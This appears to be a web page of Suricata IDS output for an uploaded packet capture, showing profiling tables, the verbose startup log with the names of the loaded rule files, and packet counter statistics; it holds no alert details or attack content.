Filename: network.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 23.5041158199 seconds
Hash: cfcab331f081527fd30a5330ac5c8df5
Uploaded: 1554298797

Logfiles


packet_stats.log - (17744 bytes)
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       1             3       2761037516     2782194735    2775111423          8.3b    0.02
 IPv4       6         16826          1261167     3027276170    2300010933      38700.0b   99.90
 IPv4      17            51         10229331     2745297864     613694297         31.3b    0.08
 IPv6      17            17         10522313       55824799      22871542        388.8m    0.00
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       1             3            98167         118513        107755        323.3k    0.01
TMM_FLOWWORKER              IPv4       6         16826            66048       15865086        218247          3.7b   96.54
TMM_FLOWWORKER              IPv4      17            51           152153       10269554        527180         26.9m    0.71
TMM_RECEIVEPCAPFILE         IPv4       1             3             2588           2791          2717          8.2k    0.00
TMM_RECEIVEPCAPFILE         IPv4       6         16825             2528         116639          2778         46.8m    1.23
TMM_RECEIVEPCAPFILE         IPv4      17            51             2553          11192          3101        158.2k    0.00
TMM_DECODEPCAPFILE          IPv4       1             3             2951          13175          6743         20.2k    0.00
TMM_DECODEPCAPFILE          IPv4       6         16825             2645        4260444          3196         53.8m    1.41
TMM_DECODEPCAPFILE          IPv4      17            51             2682          29705          3506        178.8k    0.00
TMM_FLOWWORKER              IPv6      17            17           173696         315095        198378          3.4m    0.09
TMM_RECEIVEPCAPFILE         IPv6      17            17             2839           3632          3036         51.6k    0.00
TMM_DECODEPCAPFILE          IPv6      17            17             2691          15264          3477         59.1k    0.00

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       1             1             4294           4294          4294          4.3k  0.00  
flow                    IPv4       6         16825             2810         382073          4036         67.9m  1.98  
flow                    IPv4      17            51             2660          23280          4389        223.9k  0.01  
stream                  IPv4       6         16826             2582         721350          4214         70.9m  2.06  
app-layer               IPv4      17            51             2521          42330         10030        511.6k  0.01  
detect                  IPv4       1             3            85117         112374         99578        298.7k  0.01  
detect                  IPv4       6         16826            44592       15831359        191498          3.2b  93.75 
detect                  IPv4      17            51           135885       10080007        474260         24.2m  0.70  
tcp-prune               IPv4       6         16826             2511         450532          2828         47.6m  1.38  
flow                    IPv6      17            17             2671           9572          3431         58.3k  0.00  
app-layer               IPv6      17            17             2559           9633          3858         65.6k  0.00  
detect                  IPv6      17            17           156789         290164        180110          3.1m  0.09  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6            11             3724          40147         14634        161.0k  58.13 
http                    IPv4      17             2             4454           6319          5386         10.8k  3.89  
tls                     IPv4       6             2             2801           6432          4616          9.2k  3.33  
dns                     IPv4      17            16             3494          17839          5995         95.9k  34.64 
Proto detect            IPv4       6             1            18305          18305         18305         18.3k
Proto detect            IPv4      17            24             3172          29787          7821        187.7k
Proto detect            IPv6      17             3             2761           3827          3338         10.0k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6            13            10840         102604         47695        620.0k  10.72 
LOGGER_UNIFIED2             IPv4       6            13            17127         121672         46985        610.8k  10.56 
LOGGER_JSON_ALERT           IPv4       6            13            30700         131776         72564        943.3k  16.31 
LOGGER_JSON_DNS             IPv4      17            16            27443         446176         81039          1.3m  22.42 
LOGGER_JSON_HTTP            IPv4       6            14            39700         221667         64710        905.9k  15.67 
LOGGER_JSON_TLS             IPv4       6             1            80134          80134         80134         80.1k  1.39  
LOGGER_JSON_FILE            IPv4       6            14            49814         181896         94678          1.3m  22.92 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       1             3             3920          12213          8983        27.0k  0.01  
payload                           IPv4       6          1832             2587        1315917         27211        49.9m  10.65 
payload                           IPv4      17            51             5377        9684951        229978        11.7m  2.51  
stream                            IPv4       6          1832             2538        5874687         55391       101.5m  21.68 
http_uri                          IPv4       6            14             3966         107868         25143       352.0k  0.08  
http_request_line                 IPv4       6            14             3415          10852          6518        91.3k  0.02  
http_client_body                  IPv4       6            14             2811         114943         32388       453.4k  0.10  
http_header (request)             IPv4       6            14             8498          96452         38596       540.3k  0.12  
http_header (request trailer)     IPv4       6            14             2577           2707          2629        36.8k  0.01  
http_header_names (request)       IPv4       6            14             5181          58990         18243       255.4k  0.05  
http_accept (request)             IPv4       6            14             3022          10716          4034        56.5k  0.01  
http_referer (request)            IPv4       6            14             2858           4107          3200        44.8k  0.01  
http_content_len (request)        IPv4       6            14             2912           5240          3698        51.8k  0.01  
http_content_type (request)       IPv4       6            14             2844           6791          3979        55.7k  0.01  
http_protocol (request)           IPv4       6            14             2922           5565          4446        62.3k  0.01  
http_start (request)              IPv4       6            14             5281          22242         11471       160.6k  0.03  
http_raw_header (request)         IPv4       6            14             7114          25698         12616       176.6k  0.04  
http_method                       IPv4       6            14             3026           6793          5255        73.6k  0.02  
http_cookie (request)             IPv4       6            14             2875           3721          3262        45.7k  0.01  
http_raw_uri                      IPv4       6            14             3132           7139          5062        70.9k  0.02  
http_user_agent                   IPv4       6            14             2921          12821          6651        93.1k  0.02  
http_host                         IPv4       6            14             3114           7040          4834        67.7k  0.01  
dns_query                         IPv4      17             8             5561          17641          9346        74.8k  0.02  
tls_sni                           IPv4       6             1             3474           3474          3474         3.5k  0.00  
http_response_line                IPv4       6            14             3187          14682          7708       107.9k  0.02  
http_header (response)            IPv4       6            14             6730          40623         29218       409.1k  0.09  
http_header (response trailer)    IPv4       6            14             2603           3546          2787        39.0k  0.01  
http_content_type (response)      IPv4       6            14             3234          11083          6763        94.7k  0.02  
http_raw_header (response)        IPv4       6          1771             4030         360692          4860         8.6m  1.84  
http_cookie (response)            IPv4       6            14             2861           3653          3124        43.7k  0.01  
http_stat_code                    IPv4       6            14             2787           4730          3800        53.2k  0.01  
tls_cert_issuer                   IPv4       6             1             7489           7489          7489         7.5k  0.00  
tls_cert_subject                  IPv4       6             1             9709           9709          9709         9.7k  0.00  
tls_cert_serial                   IPv4       6             1             5157           5157          5157         5.2k  0.00  
file_data (http response)         IPv4       6          1757             2559       13668297        166596       292.7m  62.52 
Total                             IPv4                  7594                                         61619       467.9m
payload                           IPv6      17            17            10183          29995         13497       229.5k  0.05  
Total                             IPv6                    17                                         13497       229.5k

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       1             3             3664          45309         30269         90.8k  0.00  
PROF_DETECT_IPONLY          IPv4       6         13026             3175        5382111         39987        520.9m  15.02 
PROF_DETECT_IPONLY          IPv4      17            26             5883         205712         43648          1.1m  0.03  
PROF_DETECT_RULES           IPv4       1             3             2547           2570          2561          7.7k  0.00  
PROF_DETECT_RULES           IPv4       6         16826             2525        9388734         62058          1.0b  30.10 
PROF_DETECT_RULES           IPv4      17            51            74845         438266        146906          7.5m  0.22  
PROF_DETECT_STATEFUL_START    IPv4       6          1743             5111        5877393         73850        128.7m  3.71  
PROF_DETECT_STATEFUL_CONT    IPv4       1             3             2702           2779          2743          8.2k  0.00  
PROF_DETECT_STATEFUL_CONT    IPv4       6         16826             2501        6332014          6779        114.1m  3.29  
PROF_DETECT_STATEFUL_CONT    IPv4      17            51             2511          42135          5012        255.6k  0.01  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6          2867             2560        7676804          7512         21.5m  0.62  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17            16             2641           4817          2997         48.0k  0.00  
PROF_DETECT_PREFILTER       IPv4       1             3            19551          28088         24753         74.3k  0.00  
PROF_DETECT_PREFILTER       IPv4       6         16826             7697       13836737         40240        677.1m  19.52 
PROF_DETECT_PREFILTER       IPv4      17            51            26362        9721033        257826         13.1m  0.38  
PROF_DETECT_PF_PAYLOAD      IPv4       1             3             8964          17577         14240         42.7k  0.00  
PROF_DETECT_PF_PAYLOAD      IPv4       6          1832            13271        6185577         94421        173.0m  4.99  
PROF_DETECT_PF_PAYLOAD      IPv4      17            51            10633        9690746        235838         12.0m  0.35  
PROF_DETECT_PF_TX           IPv4       6          2867             2558       13682869        113208        324.6m  9.36  
PROF_DETECT_PF_TX           IPv4      17             8            10972          24274         15153        121.2k  0.00  
PROF_DETECT_PF_SORT1        IPv4       6          1307             2525         335605          4049          5.3m  0.15  
PROF_DETECT_PF_SORT1        IPv4      17            51             2929           6095          3891        198.5k  0.01  
PROF_DETECT_PF_SORT2        IPv4       1             3             2542           2547          2544          7.6k  0.00  
PROF_DETECT_PF_SORT2        IPv4       6         16826             2512         384393          2891         48.7m  1.40  
PROF_DETECT_PF_SORT2        IPv4      17            51             2560          22617          4029        205.5k  0.01  
PROF_DETECT_NONMPMLIST      IPv4       1             3             2736           2817          2781          8.3k  0.00  
PROF_DETECT_NONMPMLIST      IPv4       6         16826             2527         288311          3010         50.6m  1.46  
PROF_DETECT_NONMPMLIST      IPv4      17            51             2522           7920          3121        159.2k  0.00  
PROF_DETECT_ALERT           IPv4       1             3             2573           2816          2674          8.0k  0.00  
PROF_DETECT_ALERT           IPv4       6         16826             2518        9702013         10761        181.1m  5.22  
PROF_DETECT_ALERT           IPv4      17            51             2525          16709          2947        150.3k  0.00  
PROF_DETECT_CLEANUP         IPv4       1             3             2516           2796          2648          7.9k  0.00  
PROF_DETECT_CLEANUP         IPv4       6         16826             2546         102138          3019         50.8m  1.46  
PROF_DETECT_CLEANUP         IPv4      17            51             2521           5416          3079        157.0k  0.00  
PROF_DETECT_GETSGH          IPv4       1             3             2772           2827          2803          8.4k  0.00  
PROF_DETECT_GETSGH          IPv4       6         16826             2523         385295          5327         89.6m  2.58  
PROF_DETECT_GETSGH          IPv4      17            51             2516          44139          6668        340.1k  0

This file has been truncated.


unified2.alert.1554298818 - (13067 bytes)


suricata-report-2019-04-03-T-13-40-21-04032019.1339-network.pcap.txt - (17550 bytes)
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/cfcab331f081527fd30a5330ac5c8df556b33745cb75ec8c950e11a498e082d2 -r /var/pcap/04032019.1339-network.pcap -vvv -k none
elapsedtime:22.565926
stderr:
stdout:
3/4/2019 -- 13:39:58 - <Info> - Configuration node 'rule-files' redefined.
3/4/2019 -- 13:39:58 - <Notice> - This is Suricata version 4.0.0 RELEASE
3/4/2019 -- 13:39:58 - <Info> - CPUs/cores online: 1
3/4/2019 -- 13:39:58 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 33270 and 'request-body-inspect-window' set to 15638 after randomization.
3/4/2019 -- 13:39:58 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 31202 and 'response-body-inspect-window' set to 16588 after randomization.
3/4/2019 -- 13:39:58 - <Config> - DNS request flood protection level: 500
3/4/2019 -- 13:39:58 - <Config> - DNS per flow memcap (state-memcap): 524288
3/4/2019 -- 13:39:58 - <Config> - DNS global memcap: 16777216
3/4/2019 -- 13:39:58 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
3/4/2019 -- 13:39:58 - <Config> - preallocated 1000 hosts of size 136
3/4/2019 -- 13:39:58 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
3/4/2019 -- 13:39:58 - <Config> - using magic-file /usr/share/file/magic
3/4/2019 -- 13:39:58 - <Config> - Core dump size is unlimited.
3/4/2019 -- 13:39:58 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
3/4/2019 -- 13:39:58 - <Config> - preallocated 1000 defrag trackers of size 168
3/4/2019 -- 13:39:58 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
3/4/2019 -- 13:39:58 - <Config> - stream "prealloc-sessions": 2048 (per thread)
3/4/2019 -- 13:39:58 - <Config> - stream "memcap": 33554432
3/4/2019 -- 13:39:58 - <Config> - stream "midstream" session pickups: disabled
3/4/2019 -- 13:39:58 - <Config> - stream "async-oneside": disabled
3/4/2019 -- 13:39:58 - <Config> - stream "checksum-validation": disabled
3/4/2019 -- 13:39:58 - <Config> - stream."inline": disabled
3/4/2019 -- 13:39:58 - <Config> - stream "bypass": disabled
3/4/2019 -- 13:39:58 - <Config> - stream "max-synack-queued": 5
3/4/2019 -- 13:39:58 - <Config> - stream.reassembly "memcap": 134217728
3/4/2019 -- 13:39:58 - <Config> - stream.reassembly "depth": 0
3/4/2019 -- 13:39:58 - <Config> - stream.reassembly "toserver-chunk-size": 2568
3/4/2019 -- 13:39:58 - <Config> - stream.reassembly "toclient-chunk-size": 2650
3/4/2019 -- 13:39:58 - <Config> - stream.reassembly.raw: enabled
3/4/2019 -- 13:39:58 - <Config> - stream.reassembly "segment-prealloc": 2048
3/4/2019 -- 13:39:58 - <Config> - Delayed detect disabled
3/4/2019 -- 13:39:58 - <Config> - pattern matchers: MPM: ac, SPM: bm
3/4/2019 -- 13:39:58 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
3/4/2019 -- 13:39:58 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
3/4/2019 -- 13:39:58 - <Config> - prefilter engines: MPM
3/4/2019 -- 13:39:58 - <Config> - IP reputation disabled
3/4/2019 -- 13:39:58 - <Perf> - Registered 148 keyword profiling counters.
3/4/2019 -- 13:39:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
3/4/2019 -- 13:39:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
3/4/2019 -- 13:39:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
3/4/2019 -- 13:40:03 - <Config> - No rules loaded from ET-icmp.rules.
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
3/4/2019 -- 13:40:03 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
3/4/2019 -- 13:40:04 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
3/4/2019 -- 13:40:04 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
3/4/2019 -- 13:40:04 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
3/4/2019 -- 13:40:04 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
3/4/2019 -- 13:40:04 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
3/4/2019 -- 13:40:07 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
3/4/2019 -- 13:40:07 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
3/4/2019 -- 13:40:07 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
3/4/2019 -- 13:40:08 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
3/4/2019 -- 13:40:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
3/4/2019 -- 13:40:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
3/4/2019 -- 13:40:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
3/4/2019 -- 13:40:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
3/4/2019 -- 13:40:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
3/4/2019 -- 13:40:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
3/4/2019 -- 13:40:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
3/4/2019 -- 13:40:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
3/4/2019 -- 13:40:11 - <Config> - No rules loaded from local.rules.
3/4/2019 -- 13:40:11 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
3/4/2019 -- 13:40:11 - <Info> - Threshold config parsed: 0 rule(s) found
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for tcp-packet
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for tcp-stream
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for udp-packet
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for other-ip
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_uri
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_request_line
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_client_body
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_response_line
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_header
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_header
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_header_names
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_header_names
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_accept
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_accept_enc
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_accept_lang
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_referer
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_connection
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_content_len
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_content_len
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_content_type
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_content_type
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_protocol
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_protocol
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_start
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_start
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_raw_header
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_raw_header
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_method
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_cookie
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_cookie
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_raw_uri
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_user_agent
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_host
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_raw_host
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_stat_msg
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_stat_code
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for dns_query
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for tls_sni
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for tls_cert_issuer
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for tls_cert_subject
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for tls_cert_serial
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for dce_stub_data
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for dce_stub_data
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for ssh_protocol
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for ssh_protocol
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for ssh_software
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for ssh_software
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for file_data
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for file_data
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_request_line
3/4/2019 -- 13:40:11 - <Perf> - using shared mpm ctx' for http_response_line
3/4/2019 -- 13:40:11 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
3/4/2019 -- 13:40:11 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
3/4/2019 -- 13:40:11 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
3/4/2019 -- 13:40:11 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
3/4/2019 -- 13:40:12 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
3/4/2019 -- 13:40:12 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
3/4/2019 -- 13:40:12 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
3/4/2019 -- 13:40:12 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
3/4/2019 -- 13:40:16 - <Perf> - Unique rule groups: 104
3/4/2019 -- 13:40:16 - <Perf> - Builtin MPM "toserver TCP packet": 35
3/4/2019 -- 13:40:16 - <Perf> - Builtin MPM "toclient TCP packet": 17
3/4/2019 -- 13:40:16 - <Perf> - Builtin MPM "toserver TCP stream": 33
3/4/2019 -- 13:40:16 - <Perf> - Builtin MPM "toclient TCP stream": 19
3/4/2019 -- 13:40:16 - <Perf> - Builtin MPM "toserver UDP packet": 27
3/4/2019 -- 13:40:16 - <Perf> - Builtin MPM "toclient UDP packet": 17
3/4/2019 -- 13:40:16 - <Perf> - Builtin MPM "other IP packet": 3
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_uri": 14
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_request_line": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_client_body": 6
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toclient http_response_line": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_header": 10
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toclient http_header": 6
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_header_names": 2
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_accept": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_referer": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_content_len": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_content_type": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toclient http_content_type": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_protocol": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_start": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_method": 5
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_cookie": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toclient http_cookie": 2
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver http_host": 2
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver dns_query": 4
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver tls_sni": 2
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toserver file_data": 1
3/4/2019 -- 13:40:16 - <Perf> - AppLayer MPM "toclient file_data": 7
3/4/2019 -- 13:40:18 - <Perf> - Registered 39590 rule profiling counters.
3/4/2019 -- 13:40:18 - <Info> - fast output device (regular) initialized: alert
3/4/2019 -- 13:40:18 - <Info> - eve-log output device (regular) initialized: eve.json
3/4/2019 -- 13:40:18 - <Config> - enabling 'eve-log' module 'alert'
3/4/2019 -- 13:40:18 - <Config> - enabling 'eve-log' module 'http'
3/4/2019 -- 13:40:18 - <Config> - enabling 'eve-log' module 'dns'
3/4/2019 -- 13:40:18 - <Config> - enabling 'eve-log' module 'tls'
3/4/2019 -- 13:40:18 - <Config> - enabling 'eve-log' module 'files'
3/4/2019 -- 13:40:18 - <Config> - enabling 'eve-log' module 'ssh'
3/4/2019 -- 13:40:18 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
3/4/2019 -- 13:40:18 - <Info> - stats output device (regular) initialized: stats.log
3/4/2019 -- 13:40:18 - <Config> - AutoFP mode using "Hash" flow load balancer
3/4/2019 -- 13:40:19 - <Info> - reading pcap file /var/pcap/04032019.1339-network.pcap
3/4/2019 -- 13:40:19 - <Config> - using 1 flow manager threads
3/4/2019 -- 13:40:19 - <Config> - using 1 flow recycler threads
3/4/2019 -- 13:40:19 - <Notice> - all 2 packet processing threads, 4 management threads initialized, engine started.
3/4/2019 -- 13:40:19 - <Info> - No packets with

This file has been truncated. Go here to download in full.


stats.log - (3243 bytes) - download
------------------------------------------------------------------------------------
Date: 4/3/2019 -- 13:40:20 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 17667
decoder.bytes                              | Total                     | 3740503
decoder.ipv4                               | Total                     | 16879
decoder.ipv6                               | Total                     | 17
decoder.ethernet                           | Total                     | 17667
decoder.tcp                                | Total                     | 16825
decoder.udp                                | Total                     | 68
decoder.icmpv4                             | Total                     | 3
decoder.avg_pkt_size                       | Total                     | 211
decoder.max_pkt_size                       | Total                     | 1514
flow.tcp                                   | Total                     | 12925
flow.udp                                   | Total                     | 21
tcp.sessions                               | Total                     | 12921
tcp.syn                                    | Total                     | 13802
tcp.synack                                 | Total                     | 14
tcp.rst                                    | Total                     | 110
tcp.overlap                                | Total                     | 4
